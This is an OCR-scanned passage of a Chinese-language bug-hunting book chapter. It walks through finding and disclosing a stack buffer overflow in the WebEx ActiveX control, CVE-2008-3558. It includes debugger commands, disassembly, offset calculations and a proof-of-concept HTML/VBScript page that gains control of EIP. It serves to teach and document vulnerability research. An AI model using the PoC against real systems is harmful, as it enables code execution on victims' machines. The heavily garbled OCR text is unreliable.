serv.py ) 
01 import string,cgi 


02 from os import curdir, sep 
03 from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer 


04 

05 class WWWHandler(BaseHTTPRequestHandler): 

06 

07 def do GET(self): 

08 try: 

09 f = open(curdir + sep + "webex poc1.html") 

10 

11 self.send_response(200) 

12 self.send header('Content-type', 'text/html') 
13 self.end headers() 

14 self.wfile.write(f.read()) 

15 f.close() 

16 

17 return 

18 

19 except IOError: 

20 self.send error(404,'File Not Found: %s' % self.path) 
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22 def main(): 


23 try: 

24 server = HTTPServer(('', 80), WWWHandler) 
25 print 'server started' 

26 server.serve forever() 

27 except KeyboardInterrupt: 

28 print 'shutting down server' 

29 server.socket.close() 

30 

31 if name == ' main ': 

32 main() 


虽然 WebEx 的 这 个 ActiveX 控件 标记 为 可 安全 执行 脚本 的 ( 见 图 5-1), 这 样 
设计 本 来 是 为 了 让 它 只 能 从 webex.com 域 运 行 。 实 际 上 ， (ABN sb SA a] 
( Cross-Site Scripting, XSS ! ) 就 可 以 绕 过 这 个 要 求 。 鉴于 如 今 的 web 应 用 中 XSS 
漏洞 非常 普遍 ， 应 该 不 难 在 webex.com 域 中 找 出 这 样 的 漏洞 。 为 了 在 不 借助 XSS 
漏洞 的 前 提 下 测试 这 个 控件 ， 我 直接 在 Windows 的 hosts 文件 里 添加 了 如 下 一 项 
( 见 C:\WINDOWS\system32\drivers\etc\hosts\ ). 











127.0.0.1 localhost, www.webex.com 


之 后 , 启动 我 那个 简单 的 Python Web 服务 此 ,并 将 IE Sle] http://www.webex. 
com ( JLB] 5-3 )。 


X Command Prompt - oyihon T C NI 


uments and Settings\tk\NDesktop\wuww>python wwwserv.py 
red 
uhost, — [66/Apr/2668 12:16:26] “GET HTTP/1.1" 266 - 
i WebEx PoC ! - Micrasof! Interne! Explarer 


mfi dit 


Hel 


€) Bac > x] E P 大 ! Search sv Favorites € 3 i 国 3 





Address |E] http://www. webex.com/ 


E www.webex[1] - Notepad 
File Edit Format View Help 


<html> 
«title»webEx PoC 1</title> 
<body> 
<object classid="clsid:32E26FD9-F435-4420-A561-35D4B987CFDC" id="obj"></object> = 
<script language-'vbscript'-» 
arg = string(12, "A") 
ob].Newobject arg 
</script> 








K|5-3 ”用 我 那个 简单 的 Python Web 服务 需 测 试 webex pocl.html 
5.1.3 第 三 步 : 找到 二 进 制 文 件 中 的 对 象 方法 
到 目前 为 止 ， 我 收集 到 了 以 下 信息 。 
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Q 一 个 WebEx 对 象 , ClassID Æ (32E26FD9-F435-4A20-A561-35D4B987CFDC! . 
OQ 这 个 对 象 实现 了 IObjectSafety 接口 ， 有 和 希望 成 为 攻击 目标 ， 因 为 它 的 方 
videre war b up o 

Q 这 个 对 和 象 导 出 一 个 New0bject() 方 法 ,接受 一 个 用 户 控制 的 字符 串 作 为 输入 。 

为 了 逆向 工程 导出 的 方法 New0bject() , 我 必须 在 二 进 制 文件 atucfobj.dll PER 
到 它 。 为 此 ， 我 用 了 一 种 特别 的 技术 ， 与 Cody Pierce 在 一 篇 重要 的 MindshaRE 
文章 ”中 描述 的 类 似 。 大 意 是 调试 浏览 器 时 从 OLEAUT32!DispCallFunc 的 参数 中 
取出 调用 方法 的 地 址 。 

如 果 一 个 ActiveX 控件 的 方法 被 调用 到 ,通常 由 DispCallFunc() paar 
际 的 调用 。 这 个 函数 由 OLEAUT32.dll 导出 。 调用 方法 的 地 址 可 由 DispCallFunc() 
的 前 两 个 参数 ( 叫 作 pvInstance 和 oVft ) 确定 。 

为 了 找 出 New0bject() 方 法 的 地 址 , 我 从 WinDbg "中 打开 I 下 (调试 命令 的 详 
细 描 述 见 B.2 15 )， 并 在 OLEAUT32!DispCallFunc 处 设置 如 下 断 点 ( 见 图 5-4 )。 








0:000» bp OLEAUT32!DispCallFunc "u poi(poi(poi(esp+4))+(poi(esp+8))) L1;gc" 


E] “C:\Program Files\internet Explorectiexplorg;exe" - WinDbg:6.71.0001.404 x86, 
File Edit View Debug Window Help 


: TTClDDDD 
: ?e4llnnn 
: ??£1ü0ü000 
: 27£BUDUD 
; 77440000 
: ?7E70000 
: ?7fe0000 
: ?E290000 
; ”7ag000D 
: ?7b2Unn 
: #5400000 
: Sheeuooo 
; #f1l20000 
: F?4e0000 
> ?7cUDDDD 
: 771b0000 
; ?5c300ü0l 
: FecIOO0o 


?et5uunn 


77c6BUDD 
7&4allnn 
7?£59000 
27fd6000 
EBLUODD 
272f0a200n 
??£ff1000 
?E401000 
:?bl15üüu 
7? bo2000 
F5550000 
sbeebs 000 
??1abüll 
7? 610000 
rcii 
7? 2b5allül 
7 5cbelül 
75cb8nn 
btSc000 


UFCHETEVCY CIO EIC GTTTEPCYCTO nn 


*WINDOWS*zystemn32*mewcrt,dll 
WINLCOWS*zyvztem3zI5SER32 dll 
*WINDOWS*zyzstem32*GDI32.dll 
WINDUOWS-zgystem32^SHLWAPI.dll 
*WINDOWS*system32*ADVAPI32,.dll 
WIHDUGUWS*zwyztem3z-RPCRT4.dll 
*WINDONWS*zyztem3s2*5ecur32,dl1l 


CMWINDOUS*system325HDOCVW.dll 


*WINDOWS*system32*CRYPT32,dll 
SWIHLGWS*syaztem32MSASN1.dll 
*WINDOWS*system32*CRYPTUI,dll 
WIBHDOWS*system32-HETAPI32.dll 
*WINDOWS*system32*0LEAUT32,dll 
"WINLDGOWS*syzstem32-21e32.dll 
*WINDOWS*system32*-VERSION,dll 
WIHDOWS*system32-WINIHET.dll 
*WINDOWS*zyzstem32*WINTRUST,dll 
SWINLUCWS*syztem3z-IMAGEHLP.d11 
*WINDOWS*syvstem32*WLDáP32,dll 


Break instruction exception 一 code 30000003 (first chance) 


zs-23 


eza-n23 


0: 000% hn OLEAUT32!DispCallFunc - 


[n ann | = p | 


eax=00251eb4 ebe=7EEG4000 ece=OD000007 ede=D0000080 esi=00251t48 edi=00251lebd 

lleip-7c2?llale esp=00135tb20 ebp=00135fc34 iopl-l 
d==0023 
| 


ny up El pl nz na po nc 
fea=(03b ge=0000 efl=00000202 
j 

"i poiípoiipoiiesp-4i)])«-(poiíegsp-8])) Ll:gc" 





Ln B, Eol o Ep 下 "m Prae ntme Thrd nan: 236 = 


图 5-4 EIE "HAY OLEAUT32 !IDispCallFunc 处 定义 一 个 断 点 
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调试 命令 bp OLEAUT32!DispCallFunc 在 DispCallFunc() 开 始 的 地 方 定义 了 一 
个 断 点 。 如 采 这 个 断 点 触发 ， 艺 数 的 前 两 个 参数 将 被 求 伸 ( evaluate). fit 
poi(poi(esp+4)) 引 用 第 一 个 参数 ，poi(esp+8) 引 用 第 二 个 参数 。 这 些 值 加 在 一 起 ， 
总 和 表示 调用 方法 的 地 址 。 随 后 , 屏 雄 上 打印 出 这 个 方法 反 汇 编码 的 第 一 行 (L1) 
控件 继续 执行 gc )。 

然后 我 用 WindDbg 的 g( Go ) 命 令 运 行 IE FPR YR SE Ie] http://www.webex.com/。 
正如 我 期 望 的 ，WinDbg 里 触发 的 断 点 显示 出 了 atucfobj.dll 中 被 调用 到 的 
New0bject() 方 法 的 内 存 地 址 。 

如 图 5-5 所 示 ， 这 个 例子 中 New0bject() 方 法 的 内 存 地 址 是 0ox01d5767f。 
atucfobj.dll 自身 加 载 于 地 址 oxo1d50000 处 〈( 见 图 5-5 中 的 ModLoad: 01d50000 
01d69000 C:\Program Files\WebEx\WebEx\824\atucfobj.dll )。 因 此 NewObject() 
在 atucfobj.dll 中 的 偏 移 是 0x01d5767f - 0x01d50000 = 


(u poi(result of the computation)), 


0x767f, 


kJ “C:\Program Files\internet Explorec\iexplore,exe” 
File Edit View Debug ween Help 
= EN 


- WinDbg:6.11.0001.404 X86 





= — 
~ =| 
= E = 


ee 


xx ERROR: Symbol file could not be found 


; FladO0000 
: 71abüüDnDü 
> ?laa00DD 
: FilaSO000 
; 662b0000 
: 71a90000 
> 7bee0000 
: 76e90000 
; Fbeb0000 
: ?6EBDDDD 
: 722b0000 
: 76£20000 
; ?6tC0DDD 
: D1d50000 
: 01080000 
: 76080000 
; Olddoooo 
: 02370000 
: 05790000 
: 23300000 


71ad9D00 


?lac?000 
71aa8000 
71a8füDü 
66308000 
71896000 
76£1c000 
7 6ea2000 
76edf 000 
768000 
722b5000 
76£47000 
76f£c6000 
01069000 
ü1dcdüü00 
760e5000 
üldecüDD 
02588000 
05796000 
7336a000 


oppnpoonpnpngnoponpa 


s WINDONS system32\wsock32 , dll 
NUINDOWSwsystem32WJ52 32.dll 
*SWINDOWS*system32*WS52HELP dll 
NIINDOWSNsystem32wmswsock,dll 
*SWINDOWS*system32*hnetcfg.dll 
NUTHDOWSNSysten32\wshtcpip.dll 
*WINDOWS*system32*RASAPI32,DLL 
*WINDOUS*syzstem32«razman.dll 
*WINDOWS*system32*TAÀPI32,.dll 
NUINDOUSwsystem32wrtutils.dll 
*SWINDOWS*system32*-sensapi,dll 
NWINDOWSNsystem32*DNSAPI.dll 
JSWINDOWS*system32*rasadhlp,.dll 
Program Files\WebEx\WebEx\824\atucfobj.dll 
“Program Files sWebEx\WebExs824\atWhsU1I6, DLL 
\WINDOWSNsystem32\MS¥CP60.d11 
“Program Filess\WebEx\WebExs824\U01LibRes , DLL 
\Program Files\WebEx\WebEx\.824\atres.dll 
*Program FilessWebExs\WebExs824satkbetl ,dll 
\WINDOWS\system32\vbscript . dll 
xxx WARNING: Unable to verify checksum for C;*Program Files\WebEx\WebExs§24satuctob] , dll 


atucfobj!DllUnregisterServer-«(x355a: 
01d5767f 55 


mii 





5.1.4 


接 下 来 ,我 用 IDA Pro B T 


push 


ebp 


[*BUSY* [Debuggee is running. 


Ln 0, Col 0. Sys ü:«Lacalz- Proc O00}5a4  Thrd pBün:4c4 -= 


Defaulted to export symbole for C'\Program F - 





图 5-5 WinDbg 显示 New0bject() 方 法 的 内 存 地 址 


第 四 步 : 找到 用 尸 控 制 的 输入 数值 


二 进 制 的 C:\Program Files\WebEx\WebEx\ 





5.1. 探寻 漏洞 


824\atucfobj.dll, 在 IDA 中 , atucfobj.d11 的 映像 基 址 (imagebase ) 是 0x10000000。 
所 以 New0bject() 在 反 汇 编 中 位 于 地 址 0x1000767F (映像 基 址 + NewObject() ÉSA 
f£: 0x10000000 + 0x767F ) ( 见 图 5-6 )。 


; Attributes: bp-based frame 


> int  stdcall sub 1888767F(int, LPCWSTR ipWideCharStr, int) 
1888767F suh 1888767F proc near 
1888767F 
1666767F var 16- byte ptr -18h 
1888767F var g= dword ptr -8 
1888767F var Ne dword ptr —4 
1666767F arg G= dword ptr g 
1888767F lpWideCharStr= dword ptr Ch 
1888767F arg 8—- dword ptr 14h 


ebp 

ebp, esp 

esp, 18h 

ebx 

ebx, ebx 
[ebp*ipiideCharStr], ebx 
esi 


edi 
short loc 16667693 


18887691 jmp short loc 188876C3| |16607693 loc 18887693: 7 lpString 
1808087693 push [ebp+lpWideCharstr ] 





图 5-6 IDA Pro 中 反 汇 编 New0bject() 方 法 


开始 读 汇 编 代 人 码 之 前 ， 我 必须 确定 代码 清单 5-1 中 VBScript 代码 提供 的 用 户 

控制 学 符 串 值 保存 在 哪个 函数 参数 中 。 因 为 这 个 参数 是 一 个 字符 串 ， 我 猜测 它 将 

在 IDA 显示 的 第 二 个 参数 IpWideCharStr 中 。 但 我 想 确 定 这 一 点 ， 因 此 我 在 

Voci jet QURE ELT — —/ TMS, SPEDE HUE I eee ( 以 下 调 
试 命令 的 详细 摘 述 见 B.2 市 )。 

如 图 5-7 所 示 ， 我 在 New0bject() 的 地 址 处 定义 了 一 个 新 的 断 点 ( 0:009> bp 
01d5767f )， 继 续 执行 IE (0:009> g )， 然 后 再 次 导 回 http:/www.webex.com/ 域 。 
Br ABS, 我 检查 了 郴 数 New0bject() 第 二 个 参数 的 值 (0:000> dd poi(esp+8) 和 
0:000» du poi(esp+8) )。 正 如 调试 硕 输 出 所 示 ， 用 户 控制 什 ( 由 12 个 字符 A 组 
EI SC NY NR ) 的 确 通 过 第 二 个 参数 传递 给 函数 了 。 

最 终 ， 我 得 到 了 所 需 的 全 部 信息 ， 可 以 检查 这 个 方法 来 寻找 安全 bug 了。 
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第 5 章 


BAD 


浏览 即 遭 


RJ “C:\Program Files\internet ExplorecWiexplore;exe" - WinDbg:6.11.0001.404 X86 
File Edit View Debug Window Help 





Ss Bafta OFF. © DIEI ESTIEJESCICIRS | sit 


ommand 


D:DD9» bp OidS767£ 
0:009> g 


ModLoad: 05790000 05796000 
atucfobj!DllUnregisterServer-(üz355a: 
01d5767f 55 

Breakpoint 1 hit 
eax-7ffdeU00 ebx=01d5e6b0 ecx-0i1d5767f edx-üüiabbc2 ezsi-Ü0ü01abb74 edi=00000000 


push 


AE 


C:;*Program Files*WebEx^WebEx^824*atkbctl.dll 


ebp 


eipzlid57867f esp=0013df80 ebp=0013df£9c iopl=0 
cs=001b ss=0023 
atuctobj!DllUnregisterServer-[z355a: 
01d5767f 55 
n: ANNs dd. pos teeth) 


00143834 
n01d3844 
001d3854 
001d3864 
001d3874 
001d3884 
001d3894 
ü01d38a4 


00410041 
00410041 
abababab 
O01c0750 
00010001 
ooo00000 
feeefeec 
g01c0748 


ds-0023 


puzh 


00410041 
00410041 
00000000 
7e29b144 
00000000 
oo0000001 
00000000 
oo000000 


0:000» du poifesp+8) 
"AAAAAAAAAAAA" 


N01d3834 





es=0023 


ebp 


00410041 
baad0000 
00000000 
7e29e44c 
7e29b0¢£0 
abababab 
00000000 
O0id3aas 


fs=003b gs=0000 


00410041 
abababab 
00070008 
78293798 
001d38a8 
abababab 
00080005 
00150000 


nv up ei pl nz na po nc 
ef 1=00000202 








Ln D, Col) S¥sQi<lotal> Proc O00'Sa4 Thrd üüD:4e4. -= 


图 5-7 定义 一 个 新 的 断 点 后 New0bject() 函 数 的 用 户 控制 参数 


5.1.5 FAS: 逆向 工程 这 个 对 象 方 法 


器 顾 一 下 ,我 找到 了 一 个 明显 的 漏洞 ， 当 ActiveX 控件 处 理 New0bject() 传 过 
来 的 用 户 提供 的 字符 串 值 时 触发 。 图 5-8 展示 了 到 达 这 个 漏洞 函数 的 代码 路 径 。 


sub. 1000757F 





sub. 100077410 


sub 10U08B7B5 









sub. TEUIEAZ 


‘sub_1UUUYBUU 


sub. 1000B37D 





图 5-8 ”到 达 这 个 源 洞 函数 的 代码 路 径 ( IDA Pro 生成 ) 
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TE sub_1000767F， 用 户 提供 的 宽 字 符 字 符 串 通过 WideCharToMultiByte ( ) PRX 
转换 为 一 个 多 衬 市 字符 串 。 之 后 ， 调 用 sub 10009642, HP fil FIRE mls 
一 个 缓冲 区 。sub_10009642 中 的 代码 允许 最 多 256 个 用 户 控制 字 世 复制 到 这 个 新 
的 字符 缓冲 区 (CRI: strncpy(new buffer, user controlled string, 256) )。 
PAZ sub 10009826 得 以 调用 ， 它 又 调用 sub_100096D0， 这 个 函数 调用 了 漏洞 函数 
sub 1000B37D。 











代码 清单 5-3 ”漏洞 函数 sub 1000B37D 的 反 汇 编码 (IDA Pro 生成 ) 


[ 
.text:1000B37D ; int cdecl sub 1000B37D(DWORD cbData, LPBYTE lpData, int, int, int) 


.text:1000B37D sub 1000B37D proc near 

. text : 1000B37D 

.text:1000B37D SubKey- byte ptr -10Ch 

.text:1000B37D Type- dword ptr -8 

.text:1000B37D hKey- dword ptr -4 

.text:1000B37D cbData- dword ptr 8 

.text:1000B37D lpData- dword ptr oCh 

.text:1000B37D arg 8- dword ptr 10h 

.text:1000B37D arg C= dword ptr 14h 

.text:1000B37D arg 10- dword ptr 18h 

. text : 1000B37D 

.text:1000B37D push ebp 

.text:1000B37E mov ebp, esp 

.text:1000B380 sub esp, 10Ch 

.text:1000B386 push edi 

.text:1000B387 lea eax, [ebp+SubKey] ; the address of SubKey is saved in eax 
.text:1000B38D push _[ebp+cbData] ; 4th parameter of sprintf(): cbData 
.text:1000B390 xor edi, edi 

.text:1000B392 push offset aAuthoring ; 3rd parameter of sprintf(): "Authoring" 
.text:1000B397 push offset aSoftwareWebexU ; 2nd parameter of sprintf(): "SOFTWARE\\.. 


. text: 1000B397 ; «Webex\\UCF\\Components\\%s\\%s\\Install" 
.text:1000B39C push eax ; 1st parameter of sprintf(): address of SubKey 
.text:1000B39D call ds:sprintf ; call to sprintf() 


[..] 


.data:10012228 ; char aSoftwareWebexU[] 
.data:10012228 aSoftwareWebexU db ‘SOFTWARE\Webex\UCF\Components\%s\%s\Install' ,0 


[e] 





sub 1000B37D 的 第 一 个 参数 叫 作 cbData， 它 包含 一 个 指向 保存 在 新 的 字符 组 
冲 区 (图 5-8 的 介绍 中 提 到 的 那个 new buffer) 中 用 户 控制 数据 的 指针 。 我 之 前 
说 过 , 用 户 控制 的 宽 字 符 数 据 以 多 字 节 字符 串 的 形式 保存 在 这 个 新 缓 种 区 中 , 缓冲 
区 的 最 大 长 度 是 256 字 节 。 代 码 清单 5-3 显示 ,地址 .text:1000B39D 处 的 sprintf() 
PAZ cbData 指 回 的 用 户 控制 数据 到 栈 绥 冲 区 SubKey 中 〈 见 .text:1000B387 
Ail. text :1000B39C )。 
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然后 ， 我 试图 取得 栈 缓冲 区 SubKey 的 大 小 。 按 下 CTRL-K 打开 IDA Pro 的 默 
认 栈 帧 显示 。 如 图 5-9 所 示 ， 栈 缓冲 区 SubKey 固定 大 小 为 260 字 节 。 如 果 把 代码 
清单 5-3 中 的 反 汇 编码 显示 的 信息 与 这 个 漏洞 函数 的 栈 布 局 信息 结合 起 来 ， 
sprintf() 的 调用 就 可 以 表示 为 代码 清单 5-4 中 的 C 语言 代码 。 





A Stack frame 
Edit Jump Search 
-00000610C SubKey 268 dup(?) ; stack buffer 
-§6600008 Type 7 
-88880808^ hKey ? ; offset 
-B888088880 s 4% dup(?) 
+00000004 r h dup(?) ; saued return address 
*B8808888088 chData ? 
+0000000C lpData : Struct field size 
+00000010 arg 8 
88888815 ary € : Lurrent ottset — : U:ULULUULIUA 
*B08080808018 arg 180 : Next defined item at : 0:00000108 
*8080000801C 
-B888888016 ; end of stack variables Array element width : 1 

; Maximal possible size: 260 
Current array size : 260 

















4 





|SP-++00000004 





Array size 260 " [in elements) 


Items on a line D "Y [Mma] 


Alignment — -1 Y (-1-none.0-auto) 





图 5-9 HI] IDA Pro 的 默认 栈 帧 显示 来 确定 栈 缓冲 区 SubKey 的 大 小 





代码 清单 5-4 有 漏洞 的 sprintf() 调 用 ，C 语言 伪 代 码 

[..] 

in 

sub 1000B37D(DWORD cbData, LPBYTE lpData, int vali, int val2, int val3) 
t 


sprintf(&SubKey, "SOFTWARE\\Webex\\UCF\\Components\\%s\\%s\\Install", 
"Authoring", cbData); 
[..] 


EPR sprintf() 从 cbData 复制 用 户 控制 数据 、Authoring 字符 串 (9 AT ) 
和 格式 字符 串 (39 E47) 到 SubKey。 如 采 cbData 填充 了 最 大 长 度 的 用 户 控 制 数 
据 (256 F7 )， 总 共 将 有 304 字 市 的 数据 被 复制 到 栈 绥 冲 区 中 。SubkKey 只 能 存放 
260 FEAE, M sprintf() 不 做 任何 长 度 检查 。 因 此 ， 如 图 5-10 所 示 ， 用户 控 
制 数 据 可 能 写 到 SubKey 之 外 ， 这 将 会 导致 栈 缓冲 区 洲 出 〈 见 A.1 方 )。 
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fe E ay ap RE usd fg ad FE 
* . Nlnstall" 
保存 曲 返回 地 址 ~、 用 户 控制 曲 数据 
= 
的 
SubKey Š Subkey ( 260B > 
( 260B> 向 





“SOFTWARE\Webex\ 
UCF\Components\ 


NEM | m Autho ring\...” 


图 5-10 一 个 过 长 的 字符 串 传递 给 New0bject() 时 发 生 的 栈 缓冲 区 溢出 示意 图 


5.2 imo FH 


找到 这 个 漏洞 之 后 ， 利 用 它 是 非常 简单 的 。 我 只 需 微调 传递 给 NewObject() 
的 字符 串 参 数 的 长 度 ， 使 得 栈 缓冲 区 汶 出 ， 然 后 控制 当前 栈 帧 的 返回 地 址 。 

如 图 5-9 所 示 ， 从 SubKey 缓冲 区 到 栈 上 保存 返回 地 址 的 位 置 有 2725€. CI 
存 返 回 地 址 的 偏 移 ( +00000004 ) 减 去 SubKey 的 偏 移 ( -0000010C ): 0x4 - -0x10c = 
0x110(272) )。 还 要 考虑 字符 串 Authoring 以 及 部 分 格式 字符 串 将 被 复制 到 SubKey 
中 正好 位 于 用 户 控 制 数 据 之 前 的 位 置 ( 见 图 5-10). 总而言之 ， 我 必须 从 SubKey 
到 保存 的 返回 地 址 的 间距 中 减 去 40 575 ( SOFTWARE\Webex\UCF\Components\ 
Authoring\ ) (272 - 40 = 232 )。 因 此 我 要 提供 232 字 市 的 伪 数 据 (dummy data ) 
来 填充 栈 ， 下 到 栈 上 保存 的 返回 地 址 处 。 人 然后 紧 接着 的 4 字 节 用 户 控 制 数 据 将 禾 
号 栈 上 保存 的 返回 地 址 值 。 

因此 我 改变 了 webex pocl.html 第 6 行 提 供 的 字符 数 ， 并 把 文件 重 命 名 为 
webex poc2.html ( 见 代码 清单 5-5 )。 

















代码 清单 5-5 ”传递 一 个 过 长 的 字符 串 给 New0bject() 方 法 的 HTML 文件 


( webex poc2.html ) 
01 «html» 
02 «title»WebEx PoC 2«/title» 
03 «body» 


04 <object classid-"clsid:32bE26FD9-F435-4A20-A561-35D4B987CFDC" id="obj"></object> 
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05 
06 
07 
08 
09 
10 


09 


09 
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«script language='vbscript'> 
arg = String(232, "A") + String(4, "B") 
obj.NewObject arg 

«/script» 

«/body» 


«/html» 


然后 调整 那个 简单 的 Python Web Bits: EA] ARI Tt HTML 文件 。 
原来 的 wwwserv.py 如 下 。 


f = open(curdir + sep + "webex poci.html") 


调整 后 的 wwwserv.py 如 下 « 


f = open(curdir + sep + "webex poc2.html") 


重启 Web ks, Tr WinDbg 里 加 载 IE, AX] http://www.webex.com/. 
= 5-11 所 示 ， 现 在 我 完全 控制 了 EIP。 使 用 著名 的 堆 喷 射 (heap spraying ) 
这 个 bug 很 容易 利用 ， 用 来 实现 任意 代码 执行 攻击 。 


| “C:\Program Files\internet Explorer\iexplore.exe” - WinDbe:6,11.0001.404 X86 


File Edit View: Debug ‘Window Help 
Ss. cOGB cp x3» zs BPRS 


ommand 


HodLoad : 
ModLoad: 





4^ DRDO OO A GE 


71a38000 -\WINDOWSSSystem32\wshtcpip. dll 


76f£1c000 


71a9DDDD- 
76ee0000 


ModLoad: 
ModLoad : 
ModLoad: 
HodLoad: 
ModLoad: 
ModLoad: 
ModLoad: 
ModLoad: 
ModLoad: 
ModLoad : 
ModLoad: 
ModLoad: 
ModLoad: 
(78.3bc): 


eip-42424242 esp-0013dac4 ebp-41414141 iopl-0 
ds=0023 


c==001b 


76e90000 
76eb0000 
76e80000 
722b0000 
76£20000 
76f£c0000 
O1le50000 
01680000 
76080000 
Oled0000 
02470000 
05790000 
73300000 


?6eaZ2000 
76edfü00 
76e8e000 
722b5000 
76£47000 
76£c6000 
O1e69000 
Olecd 000 
760e5000 
OleecO00 
02688000 
05796000 
7336a000 


E 
Gs 
C: 
Ei 
kx 
[ER 
oe 
m 
C 
La 
C 
GE 
C 
is: 


*WINDOWS*syzstem32*RASAPI32,DLL 
NWINDOWS*syzstem32*rasman.dll 
*WINDOWS*system32*TAPI32,dll 
NWINDOWS*ssystem32wrtutilzs.dll 
*WINDOWS*system32*senzsapi,dll 


OXJINDOWS*syzstem32*DNSAPI.dll 
OXWINDOWS*system32*rasadhlp.dll 
:~Program Files^UebEz^WebEz^824*atucfobj.dll 


«Program Files*WebEx^WebEx*824*atWbxUI6.DLL 


ONWINDOUWS*«system32*MSVCP6D.dll 


«Program Filezs^WebExWebEzx*824*UILibRes.DLL 


Program File=\WebEx\WebEx\824\atres dll 
XProgram Files*WebEz*WUebEx*824*atkbctl,dll 
OWINDOWS*zsystem32*vbscript.dll 


Access violation 一 code cO000005 (first chance) 

First chance exceptions are reported before any exception handling. 

This exception may be expected and handled, 

eax=Q0000000 ebs=00000000 ecx-7c981003d ede=00150608 ezi-0003b5024 edi-ü0003b024 


zz-[023 


ez-D023 


£Unloaded Eng.dll»c-D1x42424241; 
42424242 ?7 


t | 


2??? 


nv up &i pl zr na pe nc 


fs=003b gs=0000 ef1=00010246 





照例 ， 





德国 法 律 不 允许 我 提供 一 个 完 
有 兴趣 ， 可 以 到 本 书 的 网 站 上 看 看 我 录制 的 一 
FEto 


[n-onns | 


€ am m a ——— m 一 一 -- 


"m 5, Col B Sys 0}<Local> ‘Pre ooo78 Thrd noo: 3bc -- 


IE 的 EIP 控制 


整 的 、 可 工作 的 漏洞 利用 程序 ， 如果 你 
个 演示 实际 漏洞 利用 程序 的 视频 


图 5-11 
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之 前 提 到 过 ， 如 果 用 COMRaider 来 模糊 测试 这 个 ActiveX EF, MABEL 
fV, FABRE HI bug. (Ae, WE, BACAR DECIPI AS Ir, 
不 是 吗 ? 


5.3 漏洞 修正 


2008 年 8 上 月/ 日， 星期 四 








在 第 2 草 到 第 4 章 里 ， 我 把 安全 bug 直接 通知 了 受害 软件 的 开发 商 ， 并 帮助 
他 们 打 好 补丁 。 这 个 bug 我 选择 另外 一 种 披露 过 程 。 这 一 次 我 没有 下 接 通 知 开 发 
al, ， 而 是 把 这 个 bug 出 售 给 一 个 漏洞 经 纪 人 (Verisign iDefense Labs 的 “VCP if 
划 ”)， 之 后 由 他 们 和 思科 协作 ( 见 2.3 节 )。 

2008 年 4 月 8 日 ,我 联系 了 了 iDefense。 他 们 接受 了 我 的 提交 ， 并 把 这 个 问题 
通知 了 思科 。 在 思科 正 开发 新 版 的 ActiveX 控件 时 , 为 一 位 安全 人 研究 员 Elazar Broad 
在 2008 年 6 月 重 现 了 这 个 bug. 他 也 通知 了 思科 , 但 随后 以 完全 披露 的 方式 公开 了 
这 个 bug “。2008 年 8 月 14 日 ,思科 发 布 了 WebEx 会 议 管理 软件 的 一 个 修复 版 本 
以 及 一 份 安全 报告 。 总 之 乱 作 一 团 , 但 最 终 Elazar 和 我 还 是 让 互联 网 更 安全 了 一 些 。 





5.4 经验 和 教训 


a 在 广泛 部 署 的 ( 企业 ) 软件 产品 中 仍 有 明显 的 、 容 易 利 用 的 bug。 

O 跨 站 点 脚本 攻击 破坏 ActiveX 的 域 限制 .对 微软 的 SiteLock 而 言 也 是 这 样 “ 。 
a 从 捉 虫 人 的 观点 来 看 ，ActiveX 控件 是 有 前 途 、 有 价值 的 目标 。 

a dila RE AS (RAK T )o 








5.5 补充 
2008 年 9 月 /7 日 ， 里 斯 三 
因为 这 个 漏洞 已 修复 ，WebEx 会 议 管理 软件 的 新 版 本 也 已 经 可 以 获得 ， 所 以 


今天 我 在 自己 的 网 站 上 发 布 了 一 份 详细 的 安全 报告 中。 这 个 bug 的 编号 是 
CVE-2008-3558。 图 5-12 显示 这 个 漏洞 修复 的 时 间 表 。 
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MN Vn fee Elazar Broad ^À fpi ela) C 完全 披露 》 
/ 
AM 7 / 
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| / zi lol a EN | T 1X B te +i \t ny um f 5H Tx à il ux I 1X GB 
ws [TA d M, WM A 
Y w v Y Ww 
04.06.2008 04.08.2008 O6.20.2008 08.06.2008 08.14.2008 09.17.2008 





图 5-12. MEI WebEx 会 议 管理 软件 的 这 个 漏洞 到 发 布 其 安全 报告 的 时 
间 表 


附注 

[1] iDefense 的 COMRaider 是 列举 和 模糊 测试 COM Xf A fe A AY GRO TH I 
http://labs.idefense.com/software/download/?downloadID-23 ( 短 址 为 http://bit.ly/yEG097 )。 

[2] 更 多 信息 可 查看 “ActiveX 控件 的 安全 初始 化 和 安全 执行 脚本 (Safe Initialization and 
Scripting for ActiveX Controls )”， 网 址 : http://msdn.microsoft.com/en-us/library/aa751977 
(VS.85) .aspx ( 短 址 为 http://bit.ly/ACfHmyv )。 

[3] J "Not safe = not dangerous? How to tell if ActiveX vulnerabilities are exploitable in Internet 
Explorer ( 不 安全 = 不 危险 ”如 何 判 断 ActiveX 漏洞 在 IE 中 是 可 利用 的 )”， 网 址 : 
http://blogs.technet.com/srd/archive/2008/02/03/activex-controls.aspx( 短 址 为 http://bit.ly/xJDqOA )。 

[4] 关于 跨 站 脚本 攻击 的 更 多 信息 , 参考 : https://www.owasp.org/index.php/Cross-site Scripting - 
(XSS) (LA http://bit.ly/yV7cWM )。 

[5] Ji “( MindshaRE: Finding ActiveX Methods Dynamically )" , HE: http://dvlabs.tippingpoint. com/ 
blog/2009/06/01/mindshare-finding-activex-methods-dynamically/ ( 短 址 为 http://bit.]ly/xN1IRn )。 

[6] JL http://msdn.microsoft.com/en-us/library/9a16d4e4-a03d-459d-a2ec-3258499f6932(VS.85) ( 短 址 
为 http://bit.ly/y WwOR9 )。 

[7] WinDbg Æ Microsoft E 7; HJ^ Windows 调试 需 , 作 为 免费 的 ”Windows 调试 工具 ( Debugging 
Tools for Windows )” 组 件 的 一 部 分 发 布 ， 可 从 以 下 网 址 得 到 : http://www.microsoft.com/ 
whdc/DevTools/Debugging/default.mspx ( 短 址 为 http://bit.ly/Akd3nd )。 

8] Jil http://www.hex-rays.com/idapro/ ( 短 址 为 http://bit.ly/y3 Vlat )。 

9] Jl http://www.trapkit.de/books/bhd/ ( AHL http://bit.ly/yZX6td ). 

10] JL http://seclists.org/fulldisclosure/2008/Aug/83 ( 短 址 为 http://bit.ly/winxt4 ). 

11] 关于 Microsoft SiteLock 的 更 多 信息 ， 见 http://msdn.microsoft.com/en-us/library/bb250471% 
28VS.85%29.aspx ( 短 址 为 http://bit.ly/xd5rul ). 

[12] 关于 WebEx 会 议 管 理 软件 这 个 漏洞 的 细节 ， 我 的 安全 报告 可 从 以 下 网 址 得 到 : http://www. 

trapkit.de/advisories/TKADV2008-009.txt ( 短 址 为 http://bit.ly/wWOUVRk )。 
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2008 年 3 月 8 日 ， 里 期 六 








